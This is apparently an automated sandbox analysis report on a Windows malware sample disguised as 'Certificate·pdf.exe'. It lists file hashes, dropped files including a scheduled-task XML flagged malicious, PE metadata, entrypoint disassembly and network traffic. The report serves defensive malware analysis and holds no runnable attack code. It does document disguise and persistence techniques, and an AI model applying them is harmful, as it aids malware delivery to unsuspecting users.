SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fi2vmce3.hg0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcctfgke.xqs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp39FB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1319
Entropy (8bit):	5.131285242271578
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnJxtn:cbk4oL600QydbQxIYODOLedq3ZJj
MD5:	497F298FC157762F192A7C42854C6FB6
SHA1:	04BEC630F5CC64EA17C0E3E780B3CCF15A35C6E0
SHA-256:	3462CBE62FBB64FC53A0FCF97E43BAAFE9DD9929204F586A86AFE4B89D8048A6
SHA-512:	C7C6FD3097F4D1CCD313160FEDF7CB031644E0836B8C3E25481095E5F4B003759BC84FC6EA9421E3A090E66DC2FF875FEC2F394A386691AB178CB164733411B2
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	International EBCDIC text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:ktn:ktn
MD5:	3CD911AE73862FDF8C06CA630737A36E
SHA1:	6CC16AC9160C9E5506B1E35A3C1050E29DD6D8F6
SHA-256:	9146F42E89C7A69ED49F9D7F4AE52F703FF6064AE30FFF70B338CBA530F28FD5
SHA-512:	F9BEEB8F01BC42B94CE3D4517AE511BB74FD30A544808F3DC95369F49ADB6664D179FFA6BF1909368C600F19CDE2C4B60A95FDA26D3D4BA71DFB48C5016DC290
Malicious:	true
Preview:	......H

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\task.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.745141646068962
Encrypted:	false
SSDEEP:	3:oMty8WbSmm:oMLWumm
MD5:	F781103B538E4159A8F01E3BE09B1F8D
SHA1:	27992585DE22A095BABCFD75E8F96710DD921C37
SHA-256:	BEA91983791C26C19AA411B2870E89AFC250EAF9855B6E1CE7BEA02B74E7F368
SHA-512:	D50AE0A01E74FC263B704FADE17CDF4993B61E34FD498827D546F090CE2DA5E8F24D4D34FBF360AE7EE5C5E7E3F032F3DDA8AD0C2A2CF0E1DAFEED61258AB4CA
Malicious:	false
Preview:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	182
Entropy (8bit):	5.07060597644582
Encrypted:	false
SSDEEP:	3:RGXKRjN3Mxm8d/AjhclROXDD9jmKXVM8/FOoDamd9xraWMZ4MKLJFcLEWgJya7:zx3M7ucLOdBXVNYmd9NaWM6MKnH5JyY
MD5:	B08826036A3E81B44E7D8C1284381013
SHA1:	96CF7E6BC1B55C69CE33BEC3B78FFF4EB8839B87
SHA-256:	E7AD5092F56BB2ACA26262C361FE5F83171D21AB134D4E5D2EF47E9BF641B549
SHA-512:	EB9908F6FB6398EDCE4F3B18AA64ABEE8774D1CA3A5B533617C97AAC5E795627CCB8B1176BE64371E6BEF6352004FC2B4862A388D61A6103D05B5B2D02CD0481
Malicious:	false
Preview:	Microsoft (R) .NET Framework CasPol 2.0.50727.9149..Copyright (c) Microsoft Corporation. All rights reserved.....ERROR: Invalid option: 0....For usage information, use 'caspol -?'..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.294437364550473
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Certificate#U00b7pdf.exe
File size:	414'504 bytes
MD5:	6db7bb3d97afa79630d4085427e93bdf
SHA1:	c3c7306af8b9b4fa9602dec9b128f895af169646
SHA256:	6f3d9c1d62a29f4a030a0d2bded9600599d301784f5f0b6edfc96fc3b2b404fb
SHA512:	8322052981a347b45b867cc78e1b2ef2fe009c424b4e3f293e36aa012efe38710c357aabe7392b2e925969e802abc610ebf9be36c0ff7c7f37f3ad7165effed3
SSDEEP:	6144:olgvTRHyKTMEftsqrTCLNOMK8YRW+gFaZ2Bx54h6MKQagKH/UdNK1jM5KlqH:42ZhjzErFaZ2Bz4QMdaDH/ULk4
TLSH:	0794CE5728DC8AC2D5AD06300CEDF72D7E26AE253C208E1B6E95F63E683125156F723D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....

File Icon


Icon Hash:	b2eece86d2c6ceb2

Static PE Info

General

Entrypoint:	0x40336c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=ulandene@Corcopali.Ku, OU="Pruinescence Maskeforbuddets ", O=Massbus, L=Les Marches, S=Auvergne-Rh\xf4ne-Alpes, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	16/09/2022 12:06:26 15/09/2025 12:06:26
Subject Chain	E=ulandene@Corcopali.Ku, OU="Pruinescence Maskeforbuddets ", O=Massbus, L=Les Marches, S=Auvergne-Rh\xf4ne-Alpes, C=FR
Version:	3
Thumbprint MD5:	11C802B835F07C0212A6D4026F41FE39
Thumbprint SHA-1:	013E38BE1B856F19BB639CEBFCD9369B84F289E3
Thumbprint SHA-256:	FC40A38D2552D24E873FC5A90501F5E0CF812D91ED56E86C198C2EDB0292759D
Serial:	51F15813901F70C07491F94FBC623762B9BBCB02

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A8A2Ch], eax
je 00007F1510D28FF3h
push ebx
call 00007F1510D2C2A5h
cmp eax, ebx
je 00007F1510D28FE9h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F1510D2C21Fh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F1510D28FCCh
push 0000000Ah
call 00007F1510D2C278h
push 00000008h
call 00007F1510D2C271h
push 00000006h
mov dword ptr [007A8A24h], eax
call 00007F1510D2C265h
cmp eax, ebx
je 00007F1510D28FF1h
push 0000001Eh
call eax
test eax, eax
je 00007F1510D28FE9h
or byte ptr [007A8A2Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [007A8AF8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0079FEE0h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3cb000	0x1bf60	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x630e8	0x2240	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6400	0x6400	eed0986138e3ef22dbb386f4760a55c0	False	0.6783203125	data	6.511089687733535	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	2914bac53cd4485c9822093463e4eea6	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb38	0x600	09e0c528682cd2747c63b7ba39c2cc23	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x22000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3cb000	0x1bf60	0x1c000	b77ccb4745048eb38afe9b9645a88130	False	0.19359479631696427	data	4.072795012004936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3cb2f8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m	English	United States	0.06339465278599314
RT_ICON	0x3dbb20	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m	English	United States	0.11785545583372697
RT_ICON	0x3dfd48	0x2e68	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9894781144781145
RT_ICON	0x3e2bb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m	English	United States	0.1521784232365145
RT_ICON	0x3e5158	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m	English	United States	0.19394934333958724
RT_ICON	0x3e6200	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m	English	United States	0.3147163120567376
RT_DIALOG	0x3e6668	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3e6768	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x3e6888	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3e6950	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3e69b0	0x5a	data	English	United States	0.7666666666666667
RT_VERSION	0x3e6a10	0x210	data	English	United States	0.4734848484848485
RT_MANIFEST	0x3e6c20	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2024 07:26:11.696929932 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:11.697029114 CEST	443	49776	142.250.191.110	192.168.11.20
Jul 5, 2024 07:26:11.697305918 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:11.700494051 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:11.700563908 CEST	443	49776	142.250.191.110	192.168.11.20
Jul 5, 2024 07:26:11.978763103 CEST	443	49776	142.250.191.110	192.168.11.20
Jul 5, 2024 07:26:11.979029894 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:11.980731964 CEST	443	49776	142.250.191.110	192.168.11.20
Jul 5, 2024 07:26:11.980940104 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:12.011059046 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:12.011109114 CEST	443	49776	142.250.191.110	192.168.11.20
Jul 5, 2024 07:26:12.011985064 CEST	443	49776	142.250.191.110	192.168.11.20
Jul 5, 2024 07:26:12.012155056 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:12.013387918 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:12.056289911 CEST	443	49776	142.250.191.110	192.168.11.20
Jul 5, 2024 07:26:12.228362083 CEST	443	49776	142.250.191.110	192.168.11.20
Jul 5, 2024 07:26:12.228568077 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:12.228599072 CEST	443	49776	142.250.191.110	192.168.11.20
Jul 5, 2024 07:26:12.228792906 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:12.230214119 CEST	49776	443	192.168.11.20	142.250.191.110
Jul 5, 2024 07:26:12.230287075 CEST	443	49776	142.250.191.110	192.168.11.20
Jul 5, 2024 07:26:12.353518963 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:12.353621006 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:12.353818893 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:12.353984118 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:12.354032993 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:12.634586096 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:12.634852886 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:12.637408972 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:12.637440920 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:12.638120890 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:12.638314962 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:12.638638973 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:12.680231094 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.847089052 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.847341061 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.863024950 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.863282919 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.871285915 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.871546984 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.879569054 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.879746914 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.879802942 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.879992008 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.880043030 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.880227089 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.965667009 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.965882063 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.965954065 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.966192961 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.969813108 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.970108032 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.970161915 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.970415115 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.978013039 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.978254080 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.978307962 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.978558064 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.986404896 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.986625910 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.986696005 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.986920118 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.994754076 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.995009899 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:13.995066881 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:13.995323896 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.003010988 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.003247976 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.003304005 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.003540993 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.011383057 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.011636972 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.011708021 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.011951923 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.019745111 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.019994020 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.020047903 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.020270109 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.027934074 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.028167009 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.028238058 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.028477907 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.036155939 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.036439896 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.036494017 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.036777020 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.044342041 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.044630051 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.044683933 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.044965982 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.052448034 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.052783966 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.052838087 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.053113937 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.060648918 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.060957909 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.064726114 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.064934015 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.064981937 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.065201044 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.065254927 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.065521955 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.084825039 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.085062027 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.085127115 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.085395098 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.087873936 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.088108063 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.088192940 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.088430882 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.093799114 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.094043016 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.094096899 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.094332933 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.099531889 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.099749088 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.099826097 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.100065947 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.104819059 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.105053902 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.105108976 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.105345011 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.110366106 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.110611916 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.110620975 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.110685110 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.110939026 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.115690947 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.115947962 CEST	49777	443	192.168.11.20	142.250.191.129
